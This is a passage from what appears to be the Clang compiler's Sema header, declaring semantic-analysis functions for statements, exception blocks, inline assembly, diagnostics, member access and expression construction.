void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind,
ArrayRef<CapturedParamNameType> Params,
unsigned OpenMPCaptureLevel = 0);
StmtResult ActOnCapturedRegionEnd(Stmt *S);
void ActOnCapturedRegionError();
RecordDecl *CreateCapturedStmtRecordDecl(CapturedDecl *&CD,
SourceLocation Loc,
unsigned NumParams);
enum CopyElisionSemanticsKind {
CES_Strict = 0,
CES_AllowParameters = 1,
CES_AllowDifferentTypes = 2,
CES_AllowExceptionVariables = 4,
CES_FormerDefault = (CES_AllowParameters),
CES_Default = (CES_AllowParameters | CES_AllowDifferentTypes),
CES_AsIfByStdMove = (CES_AllowParameters | CES_AllowDifferentTypes |
CES_AllowExceptionVariables),
};
VarDecl *getCopyElisionCandidate(QualType ReturnType, Expr *E,
CopyElisionSemanticsKind CESK);
bool isCopyElisionCandidate(QualType ReturnType, const VarDecl *VD,
CopyElisionSemanticsKind CESK);
StmtResult ActOnReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp,
Scope *CurScope);
StmtResult BuildReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnCapScopeReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnGCCAsmStmt(SourceLocation AsmLoc, bool IsSimple,
bool IsVolatile, unsigned NumOutputs,
unsigned NumInputs, IdentifierInfo **Names,
MultiExprArg Constraints, MultiExprArg Exprs,
Expr *AsmString, MultiExprArg Clobbers,
unsigned NumLabels,
SourceLocation RParenLoc);
void FillInlineAsmIdentifierInfo(Expr *Res,
llvm::InlineAsmIdentifierInfo &Info);
ExprResult LookupInlineAsmIdentifier(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Id,
bool IsUnevaluatedContext);
bool LookupInlineAsmField(StringRef Base, StringRef Member,
unsigned &Offset, SourceLocation AsmLoc);
ExprResult LookupInlineAsmVarDeclField(Expr *RefExpr, StringRef Member,
SourceLocation AsmLoc);
StmtResult ActOnMSAsmStmt(SourceLocation AsmLoc, SourceLocation LBraceLoc,
ArrayRef<Token> AsmToks,
StringRef AsmString,
unsigned NumOutputs, unsigned NumInputs,
ArrayRef<StringRef> Constraints,
ArrayRef<StringRef> Clobbers,
ArrayRef<Expr*> Exprs,
SourceLocation EndLoc);
LabelDecl *GetOrCreateMSAsmLabel(StringRef ExternalLabelName,
SourceLocation Location,
bool AlwaysCreate);
VarDecl *BuildObjCExceptionDecl(TypeSourceInfo *TInfo, QualType ExceptionType,
SourceLocation StartLoc,
SourceLocation IdLoc, IdentifierInfo *Id,
bool Invalid = false);
Decl *ActOnObjCExceptionDecl(Scope *S, Declarator &D);
StmtResult ActOnObjCAtCatchStmt(SourceLocation AtLoc, SourceLocation RParen,
Decl *Parm, Stmt *Body);
StmtResult ActOnObjCAtFinallyStmt(SourceLocation AtLoc, Stmt *Body);
StmtResult ActOnObjCAtTryStmt(SourceLocation AtLoc, Stmt *Try,
MultiStmtArg Catch, Stmt *Finally);
StmtResult BuildObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw);
StmtResult ActOnObjCAtThrowStmt(SourceLocation AtLoc, Expr *Throw,
Scope *CurScope);
ExprResult ActOnObjCAtSynchronizedOperand(SourceLocation atLoc,
Expr *operand);
StmtResult ActOnObjCAtSynchronizedStmt(SourceLocation AtLoc,
Expr *SynchExpr,
Stmt *SynchBody);
StmtResult ActOnObjCAutoreleasePoolStmt(SourceLocation AtLoc, Stmt *Body);
VarDecl *BuildExceptionDeclaration(Scope *S, TypeSourceInfo *TInfo,
SourceLocation StartLoc,
SourceLocation IdLoc,
IdentifierInfo *Id);
Decl *ActOnExceptionDeclarator(Scope *S, Declarator &D);
StmtResult ActOnCXXCatchBlock(SourceLocation CatchLoc,
Decl *ExDecl, Stmt *HandlerBlock);
StmtResult ActOnCXXTryBlock(SourceLocation TryLoc, Stmt *TryBlock,
ArrayRef<Stmt *> Handlers);
StmtResult ActOnSEHTryBlock(bool IsCXXTry, // try (true) or __try (false) ?
SourceLocation TryLoc, Stmt *TryBlock,
Stmt *Handler);
StmtResult ActOnSEHExceptBlock(SourceLocation Loc,
Expr *FilterExpr,
Stmt *Block);
void ActOnStartSEHFinallyBlock();
void ActOnAbortSEHFinallyBlock();
StmtResult ActOnFinishSEHFinallyBlock(SourceLocation Loc, Stmt *Block);
StmtResult ActOnSEHLeaveStmt(SourceLocation Loc, Scope *CurScope);
void DiagnoseReturnInConstructorExceptionHandler(CXXTryStmt *TryBlock);
bool ShouldWarnIfUnusedFileScopedDecl(const DeclaratorDecl *D) const;
/// If it's a file scoped decl that must warn if not used, keep track
/// of it.
void MarkUnusedFileScopedDecl(const DeclaratorDecl *D);
/// DiagnoseUnusedExprResult - If the statement passed in is an expression
/// whose result is unused, warn.
void DiagnoseUnusedExprResult(const Stmt *S);
void DiagnoseUnusedNestedTypedefs(const RecordDecl *D);
void DiagnoseUnusedDecl(const NamedDecl *ND);
/// Emit \p DiagID if statement located on \p StmtLoc has a suspicious null
/// statement as a \p Body, and it is located on the same line.
///
/// This helps prevent bugs due to typos, such as:
/// if (condition);
/// do_stuff();
void DiagnoseEmptyStmtBody(SourceLocation StmtLoc,
const Stmt *Body,
unsigned DiagID);
/// Warn if a for/while loop statement \p S, which is followed by
/// \p PossibleBody, has a suspicious null statement as a body.
void DiagnoseEmptyLoopBody(const Stmt *S,
const Stmt *PossibleBody);
/// Warn if a value is moved to itself.
void DiagnoseSelfMove(const Expr *LHSExpr, const Expr *RHSExpr,
SourceLocation OpLoc);
/// Warn if we're implicitly casting from a _Nullable pointer type to a
/// _Nonnull one.
void diagnoseNullableToNonnullConversion(QualType DstType, QualType SrcType,
SourceLocation Loc);
/// Warn when implicitly casting 0 to nullptr.
void diagnoseZeroToNullptrConversion(CastKind Kind, const Expr *E);
ParsingDeclState PushParsingDeclaration(sema::DelayedDiagnosticPool &pool) {
return DelayedDiagnostics.push(pool);
}
void PopParsingDeclaration(ParsingDeclState state, Decl *decl);
typedef ProcessingContextState ParsingClassState;
ParsingClassState PushParsingClass() {
ParsingClassDepth++;
return DelayedDiagnostics.pushUndelayed();
}
void PopParsingClass(ParsingClassState state) {
ParsingClassDepth--;
DelayedDiagnostics.popUndelayed(state);
}
void redelayDiagnostics(sema::DelayedDiagnosticPool &pool);
void DiagnoseAvailabilityOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass,
bool ObjCPropertyAccess,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReceiver = nullptr);
bool makeUnavailableInSystemHeader(SourceLocation loc,
UnavailableAttr::ImplicitReason reason);
/// Issue any -Wunguarded-availability warnings in \c FD
void DiagnoseUnguardedAvailabilityViolations(Decl *FD);
void handleDelayedAvailabilityCheck(sema::DelayedDiagnostic &DD, Decl *Ctx);
//===--------------------------------------------------------------------===//
// Expression Parsing Callbacks: SemaExpr.cpp.
bool CanUseDecl(NamedDecl *D, bool TreatUnavailableAsInvalid);
bool DiagnoseUseOfDecl(NamedDecl *D, ArrayRef<SourceLocation> Locs,
const ObjCInterfaceDecl *UnknownObjCClass = nullptr,
bool ObjCPropertyAccess = false,
bool AvoidPartialAvailabilityChecks = false,
ObjCInterfaceDecl *ClassReciever = nullptr);
void NoteDeletedFunction(FunctionDecl *FD);
void NoteDeletedInheritingConstructor(CXXConstructorDecl *CD);
bool DiagnosePropertyAccessorMismatch(ObjCPropertyDecl *PD,
ObjCMethodDecl *Getter,
SourceLocation Loc);
void DiagnoseSentinelCalls(NamedDecl *D, SourceLocation Loc,
ArrayRef<Expr *> Args);
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, Decl *LambdaContextDecl = nullptr,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
enum ReuseLambdaContextDecl_t { ReuseLambdaContextDecl };
void PushExpressionEvaluationContext(
ExpressionEvaluationContext NewContext, ReuseLambdaContextDecl_t,
ExpressionEvaluationContextRecord::ExpressionKind Type =
ExpressionEvaluationContextRecord::EK_Other);
void PopExpressionEvaluationContext();
void DiscardCleanupsInEvaluationContext();
ExprResult TransformToPotentiallyEvaluated(Expr *E);
ExprResult HandleExprEvaluationContextForTypeof(Expr *E);
ExprResult CheckUnevaluatedOperand(Expr *E);
void CheckUnusedVolatileAssignment(Expr *E);
ExprResult ActOnConstantExpression(ExprResult Res);
// Functions for marking a declaration referenced. These functions also
// contain the relevant logic for marking if a reference to a function or
// variable is an odr-use (in the C++11 sense). There are separate variants
// for expressions referring to a decl; these exist because odr-use marking
// needs to be delayed for some constant variables when we build one of the
// named expressions.
//
// MightBeOdrUse indicates whether the use could possibly be an odr-use, and
// should usually be true. This only needs to be set to false if the lack of
// odr-use cannot be determined from the current context (for instance,
// because the name denotes a virtual function and was written without an
// explicit nested-name-specifier).
void MarkAnyDeclReferenced(SourceLocation Loc, Decl *D, bool MightBeOdrUse);
void MarkFunctionReferenced(SourceLocation Loc, FunctionDecl *Func,
bool MightBeOdrUse = true);
void MarkVariableReferenced(SourceLocation Loc, VarDecl *Var);
void MarkDeclRefReferenced(DeclRefExpr *E, const Expr *Base = nullptr);
void MarkMemberReferenced(MemberExpr *E);
void MarkFunctionParmPackReferenced(FunctionParmPackExpr *E);
void MarkCaptureUsedInEnclosingContext(VarDecl *Capture, SourceLocation Loc,
unsigned CapturingScopeIndex);
ExprResult CheckLValueToRValueConversionOperand(Expr *E);
void CleanupVarDeclMarking();
enum TryCaptureKind {
TryCapture_Implicit, TryCapture_ExplicitByVal, TryCapture_ExplicitByRef
};
/// Try to capture the given variable.
///
/// \param Var The variable to capture.
///
/// \param Loc The location at which the capture occurs.
///
/// \param Kind The kind of capture, which may be implicit (for either a
/// block or a lambda), or explicit by-value or by-reference (for a lambda).
///
/// \param EllipsisLoc The location of the ellipsis, if one is provided in
/// an explicit lambda capture.
///
/// \param BuildAndDiagnose Whether we are actually supposed to add the
/// captures or diagnose errors. If false, this routine merely check whether
/// the capture can occur without performing the capture itself or complaining
/// if the variable cannot be captured.
///
/// \param CaptureType Will be set to the type of the field used to capture
/// this variable in the innermost block or lambda. Only valid when the
/// variable can be captured.
///
/// \param DeclRefType Will be set to the type of a reference to the capture
/// from within the current scope. Only valid when the variable can be
/// captured.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// variables that may or may not be used in certain specializations of
/// a nested generic lambda.
///
/// \returns true if an error occurred (i.e., the variable cannot be
/// captured) and false if the capture succeeded.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc, TryCaptureKind Kind,
SourceLocation EllipsisLoc, bool BuildAndDiagnose,
QualType &CaptureType,
QualType &DeclRefType,
const unsigned *const FunctionScopeIndexToStopAt);
/// Try to capture the given variable.
bool tryCaptureVariable(VarDecl *Var, SourceLocation Loc,
TryCaptureKind Kind = TryCapture_Implicit,
SourceLocation EllipsisLoc = SourceLocation());
/// Checks if the variable must be captured.
bool NeedToCaptureVariable(VarDecl *Var, SourceLocation Loc);
/// Given a variable, determine the type that a reference to that
/// variable will have in the given scope.
QualType getCapturedDeclRefType(VarDecl *Var, SourceLocation Loc);
/// Mark all of the declarations referenced within a particular AST node as
/// referenced. Used when template instantiation instantiates a non-dependent
/// type -- entities referenced by the type are now referenced.
void MarkDeclarationsReferencedInType(SourceLocation Loc, QualType T);
void MarkDeclarationsReferencedInExpr(Expr *E,
bool SkipLocalVariables = false);
/// Try to recover by turning the given expression into a
/// call. Returns true if recovery was attempted or an error was
/// emitted; this may also leave the ExprResult invalid.
bool tryToRecoverWithCall(ExprResult &E, const PartialDiagnostic &PD,
bool ForceComplain = false,
bool (*IsPlausibleResult)(QualType) = nullptr);
/// Figure out if an expression could be turned into a call.
bool tryExprAsCall(Expr &E, QualType &ZeroArgCallReturnTy,
UnresolvedSetImpl &NonTemplateOverloads);
/// Conditionally issue a diagnostic based on the current
/// evaluation context.
///
/// \param Statement If Statement is non-null, delay reporting the
/// diagnostic until the function body is parsed, and then do a basic
/// reachability analysis to determine if the statement is reachable.
/// If it is unreachable, the diagnostic will not be emitted.
bool DiagRuntimeBehavior(SourceLocation Loc, const Stmt *Statement,
const PartialDiagnostic &PD);
/// Similar, but diagnostic is only produced if all the specified statements
/// are reachable.
bool DiagRuntimeBehavior(SourceLocation Loc, ArrayRef<const Stmt*> Stmts,
const PartialDiagnostic &PD);
// Primary Expressions.
SourceRange getExprRange(Expr *E) const;
ExprResult ActOnIdExpression(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
UnqualifiedId &Id, bool HasTrailingLParen, bool IsAddressOfOperand,
CorrectionCandidateCallback *CCC = nullptr,
bool IsInlineAsmIdentifier = false, Token *KeywordReplacement = nullptr);
void DecomposeUnqualifiedId(const UnqualifiedId &Id,
TemplateArgumentListInfo &Buffer,
DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *&TemplateArgs);
bool
DiagnoseEmptyLookup(Scope *S, CXXScopeSpec &SS, LookupResult &R,
CorrectionCandidateCallback &CCC,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr,
ArrayRef<Expr *> Args = None, TypoExpr **Out = nullptr);
DeclResult LookupIvarInObjCMethod(LookupResult &Lookup, Scope *S,
IdentifierInfo *II);
ExprResult BuildIvarRefExpr(Scope *S, SourceLocation Loc, ObjCIvarDecl *IV);
ExprResult LookupInObjCMethod(LookupResult &LookUp, Scope *S,
IdentifierInfo *II,
bool AllowBuiltinCreation=false);
ExprResult ActOnDependentIdExpression(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
bool isAddressOfOperand,
const TemplateArgumentListInfo *TemplateArgs);
/// If \p D cannot be odr-used in the current expression evaluation context,
/// return a reason explaining why. Otherwise, return NOUR_None.
NonOdrUseReason getNonOdrUseReasonInCurrentContext(ValueDecl *D);
DeclRefExpr *BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
SourceLocation Loc,
const CXXScopeSpec *SS = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
const CXXScopeSpec *SS = nullptr,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
DeclRefExpr *
BuildDeclRefExpr(ValueDecl *D, QualType Ty, ExprValueKind VK,
const DeclarationNameInfo &NameInfo,
NestedNameSpecifierLoc NNS,
NamedDecl *FoundD = nullptr,
SourceLocation TemplateKWLoc = SourceLocation(),
const TemplateArgumentListInfo *TemplateArgs = nullptr);
ExprResult
BuildAnonymousStructUnionMemberReference(
const CXXScopeSpec &SS,
SourceLocation nameLoc,
IndirectFieldDecl *indirectField,
DeclAccessPair FoundDecl = DeclAccessPair::make(nullptr, AS_none),
Expr *baseObjectExpr = nullptr,
SourceLocation opLoc = SourceLocation());
ExprResult BuildPossibleImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S);
ExprResult BuildImplicitMemberExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
bool IsDefiniteInstance,
const Scope *S);
bool UseArgumentDependentLookup(const CXXScopeSpec &SS,
const LookupResult &R,
bool HasTrailingLParen);
ExprResult
BuildQualifiedDeclarationNameExpr(CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
bool IsAddressOfOperand, const Scope *S,
TypeSourceInfo **RecoveryTSI = nullptr);
ExprResult BuildDependentDeclRefExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildDeclarationNameExpr(const CXXScopeSpec &SS,
LookupResult &R,
bool NeedsADL,
bool AcceptInvalidDecl = false);
ExprResult BuildDeclarationNameExpr(
const CXXScopeSpec &SS, const DeclarationNameInfo &NameInfo, NamedDecl *D,
NamedDecl *FoundD = nullptr,
const TemplateArgumentListInfo *TemplateArgs = nullptr,
bool AcceptInvalidDecl = false);
ExprResult BuildLiteralOperatorCall(LookupResult &R,
DeclarationNameInfo &SuffixInfo,
ArrayRef<Expr *> Args,
SourceLocation LitEndLoc,
TemplateArgumentListInfo *ExplicitTemplateArgs = nullptr);
ExprResult BuildPredefinedExpr(SourceLocation Loc,
PredefinedExpr::IdentKind IK);
ExprResult ActOnPredefinedExpr(SourceLocation Loc, tok::TokenKind Kind);
ExprResult ActOnIntegerConstant(SourceLocation Loc, uint64_t Val);
ExprResult BuildUniqueStableName(SourceLocation Loc, TypeSourceInfo *Operand);
ExprResult BuildUniqueStableName(SourceLocation Loc, Expr *E);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, ParsedType Ty);
ExprResult ActOnUniqueStableNameExpr(SourceLocation OpLoc,
SourceLocation LParen,
SourceLocation RParen, Expr *E);
bool CheckLoopHintExpr(Expr *E, SourceLocation Loc);
ExprResult ActOnNumericConstant(const Token &Tok, Scope *UDLScope = nullptr);
ExprResult ActOnCharacterConstant(const Token &Tok,
Scope *UDLScope = nullptr);
ExprResult ActOnParenExpr(SourceLocation L, SourceLocation R, Expr *E);
ExprResult ActOnParenListExpr(SourceLocation L,
SourceLocation R,
MultiExprArg Val);
/// ActOnStringLiteral - The specified tokens were lexed as pasted string
/// fragments (e.g. "foo" "bar" L"baz").
ExprResult ActOnStringLiteral(ArrayRef<Token> StringToks,
Scope *UDLScope = nullptr);
ExprResult ActOnGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<ParsedType> ArgTypes,
ArrayRef<Expr *> ArgExprs);
ExprResult CreateGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<TypeSourceInfo *> Types,
ArrayRef<Expr *> Exprs);
// Binary/Unary Operators. 'Tok' is the token for the operator.
ExprResult CreateBuiltinUnaryOp(SourceLocation OpLoc, UnaryOperatorKind Opc,
Expr *InputExpr);
ExprResult BuildUnaryOp(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opc, Expr *Input);
ExprResult ActOnUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Op, Expr *Input);
bool isQualifiedMemberAccess(Expr *E);
QualType CheckAddressOfOperand(ExprResult &Operand, SourceLocation OpLoc);
ExprResult CreateUnaryExprOrTypeTraitExpr(TypeSourceInfo *TInfo,
SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
SourceRange R);
ExprResult CreateUnaryExprOrTypeTraitExpr(Expr *E, SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind);
ExprResult
ActOnUnaryExprOrTypeTraitExpr(SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
bool IsType, void *TyOrEx,
SourceRange ArgRange);
ExprResult CheckPlaceholderExpr(Expr *E);
bool CheckVecStepExpr(Expr *E);
bool CheckUnaryExprOrTypeTraitOperand(Expr *E, UnaryExprOrTypeTrait ExprKind);
bool CheckUnaryExprOrTypeTraitOperand(QualType ExprType, SourceLocation OpLoc,
SourceRange ExprRange,
UnaryExprOrTypeTrait ExprKind);
ExprResult ActOnSizeofParameterPackExpr(Scope *S,
SourceLocation OpLoc,
IdentifierInfo &Name,
SourceLocation NameLoc,
SourceLocation RParenLoc);
ExprResult ActOnPostfixUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Kind, Expr *Input);
ExprResult ActOnArraySubscriptExpr(Scope *S, Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult CreateBuiltinArraySubscriptExpr(Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult ActOnOMPArraySectionExpr(Expr *Base, SourceLocation LBLoc,
Expr *LowerBound, SourceLocation ColonLoc,
Expr *Length, SourceLocation RBLoc);
ExprResult ActOnOMPArrayShapingExpr(Expr *Base, SourceLocation LParenLoc,
SourceLocation RParenLoc,
ArrayRef<Expr *> Dims,
ArrayRef<SourceRange> Brackets);
/// Data structure for iterator expression.
struct OMPIteratorData {
IdentifierInfo *DeclIdent = nullptr;
SourceLocation DeclIdentLoc;
ParsedType Type;
OMPIteratorExpr::IteratorRange Range;
SourceLocation AssignLoc;
SourceLocation ColonLoc;
SourceLocation SecColonLoc;
};
ExprResult ActOnOMPIteratorExpr(Scope *S, SourceLocation IteratorKwLoc,
SourceLocation LLoc, SourceLocation RLoc,
ArrayRef<OMPIteratorData> Data);
// This struct is for use by ActOnMemberAccess to allow
// BuildMemberReferenceExpr to be able to reinvoke ActOnMemberAccess after
// changing the access operator from a '.' to a '->' (to see if that is the
// change needed to fix an error about an unknown member, e.g. when the class
// defines a custom operator->).
struct ActOnMemberAccessExtraArgs {
Scope *S;
UnqualifiedId &Id;
Decl *ObjCImpDecl;
};
ExprResult BuildMemberReferenceExpr(
Expr *Base, QualType BaseType, SourceLocation OpLoc, bool IsArrow,
CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult
BuildMemberReferenceExpr(Expr *Base, QualType BaseType, SourceLocation OpLoc,
bool IsArrow, const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
bool SuppressQualifierCheck = false,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult BuildFieldReferenceExpr(Expr *BaseExpr, bool IsArrow,
SourceLocation OpLoc,
const CXXScopeSpec &SS, FieldDecl *Field,
DeclAccessPair FoundDecl,
const DeclarationNameInfo &MemberNameInfo);
ExprResult PerformMemberExprBaseConversion(Expr *Base, bool IsArrow);
bool CheckQualifiedMemberReference(Expr *BaseExpr, QualType BaseType,
const CXXScopeSpec &SS,
const LookupResult &R);
ExprResult ActOnDependentMemberExpr(Expr *Base, QualType BaseType,
bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult ActOnMemberAccessExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Member,
Decl *ObjCImpDecl);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec *SS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
NestedNameSpecifierLoc NNS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
void ActOnDefaultCtorInitializers(Decl *CDtorDecl);
bool ConvertArgumentsForCall(CallExpr *Call, Expr *Fn,
FunctionDecl *FDecl,
const FunctionProtoType *Proto,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
bool ExecConfig = false);
void CheckStaticArrayArgument(SourceLocation CallLoc,
ParmVarDecl *Param,
const Expr *ArgExpr);
/// ActOnCallExpr - Handle a call to Fn with the specified array of arguments.
/// This provides the location of the left/right parens and a list of comma
/// locations.
ExprResult ActOnCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr);
ExprResult BuildCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr,
bool IsExecConfig = false);
enum class AtomicArgumentOrder { API, AST };
ExprResult
BuildAtomicExpr(SourceRange CallRange, SourceRange ExprRange,
SourceLocation RParenLoc, MultiExprArg Args,
AtomicExpr::AtomicOp Op,
AtomicArgumentOrder ArgOrder = AtomicArgumentOrder::API);
ExprResult
BuildResolvedCallExpr(Expr *Fn, NamedDecl *NDecl, SourceLocation LParenLoc,
ArrayRef<Expr *> Arg, SourceLocation RParenLoc,
Expr *Config = nullptr, bool IsExecConfig = false,
ADLCallKind UsesADL = ADLCallKind::NotADL);
ExprResult ActOnCUDAExecConfigExpr(Scope *S, SourceLocation LLLLoc,
MultiExprArg ExecConfig,
SourceLocation GGGLoc);
ExprResult ActOnCastExpr(Scope *S, SourceLocation LParenLoc,
Declarator &D, ParsedType &Ty,
SourceLocation RParenLoc, Expr *CastExpr);
ExprResult BuildCStyleCastExpr(SourceLocation LParenLoc,
TypeSourceInfo *Ty,
SourceLocation RParenLoc,
Expr *Op);
CastKind PrepareScalarCast(ExprResult &src, QualType destType);
/// Build an altivec or OpenCL literal.
ExprResult BuildVectorLiteral(SourceLocation LParenLoc,
SourceLocation RParenLoc, Expr *E,
TypeSourceInfo *TInfo);
ExprResult MaybeConvertParenListExprToParenExpr(Scope *S, Expr *ME);
ExprResult ActOnCompoundLiteral(SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc,
Expr *InitExpr);
ExprResult BuildCompoundLiteralExpr(SourceLocation LParenLoc,
TypeSourceInfo *TInfo,
SourceLocation RParenLoc,
Expr *LiteralExpr);
ExprResult ActOnInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult BuildInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult ActOnDesignatedInitializer(Designation &Desig,
SourceLocation EqualOrColonLoc,
bool GNUSyntax,
ExprResult Init);
private:
static BinaryOperatorKind ConvertTokenKindToBinaryOpcode(tok::TokenKind Kind);
public:
ExprResult ActOnBinOp(Scope *S, SourceLocation TokLoc,
tok::TokenKind Kind, Expr *LHSExpr, Expr *RHSExpr);
ExprResult BuildBinOp(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opc, Expr *LHSExpr, Expr *RHSExpr);
ExprResult CreateBuiltinBinOp(SourceLocation OpLoc, BinaryOperatorKind Opc,
Expr *LHSExpr, Expr *RHSExpr);
void DiagnoseCommaOperator(const Expr *LHS, SourceLocation Loc);
/// ActOnConditionalOp - Parse a ?: operation. Note that 'LHS' may be null
/// in the case of a the GNU conditional expr extension.
ExprResult ActOnConditionalOp(SourceLocation QuestionLoc,
SourceLocation ColonLoc,
Expr *CondExpr, Expr *LHSExpr, Expr *RHSExpr);
/// ActOnAddrLabel - Parse the GNU address of label extension: "&&foo".
ExprResult ActOnAddrLabel(SourceLocation OpLoc, SourceLocation LabLoc,
LabelDecl *TheDecl);
void ActOnStartStmtExpr();
ExprResult ActOnStmtExpr(Scope *S, SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc);
ExprResult BuildStmtExpr(SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc, unsigned TemplateDepth);
// Handle the final expression in a statement expression.
ExprResult ActOnStmtExprResult(ExprResult E);
void ActOnStmtExprError();
// __builtin_offsetof(type, identifier(.identifier|[expr])*)
struct OffsetOfComponent {
SourceLocation LocStart, LocEnd;
bool isBrackets; // true if [expr], false if .ident
union {
IdentifierInfo *IdentInfo;
Expr *E;
} U;
};
/// __builtin_offsetof(type, a.b[123][456].c)
ExprResult BuildBuiltinOffsetOf(SourceLocation BuiltinLoc,
TypeSourceInfo *TInfo,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
ExprResult ActOnBuiltinOffsetOf(Scope *S,
SourceLocation BuiltinLoc,
SourceLocation TypeLoc,
ParsedType ParsedArgTy,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
// __builtin_choose_expr(constExpr, expr1, expr2)
ExprResult ActOnChooseExpr(SourceLocation BuiltinLoc,
Expr *CondExpr, Expr *LHSExpr,
Expr *RHSExpr, SourceLocation RPLoc);
// __builtin_va_arg(expr, type)
ExprResult ActOnVAArg(SourceLocation BuiltinLoc, Expr *E, ParsedType Ty,
SourceLocation RPLoc);
ExprResult BuildVAArgExpr(SourceLocation BuiltinLoc, Expr *E,
TypeSourceInfo *TInfo, SourceLocation RPLoc);
// __builtin_LINE(), __builtin_FUNCTION(), __builtin_FILE(),
// __builtin_COLUMN()
ExprResult ActOnSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc,
SourceLocation RPLoc);
// Build a potentially resolved SourceLocExpr.
ExprResult BuildSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc, SourceLocation RPLoc,
DeclContext *ParentContext);
// __null
ExprResult ActOnGNUNullExpr(SourceLocation TokenLoc);
bool CheckCaseExpression(Expr *E);
/// Describes the result of an "if-exists" condition check.
enum IfExistsResult {
/// The symbol exists.
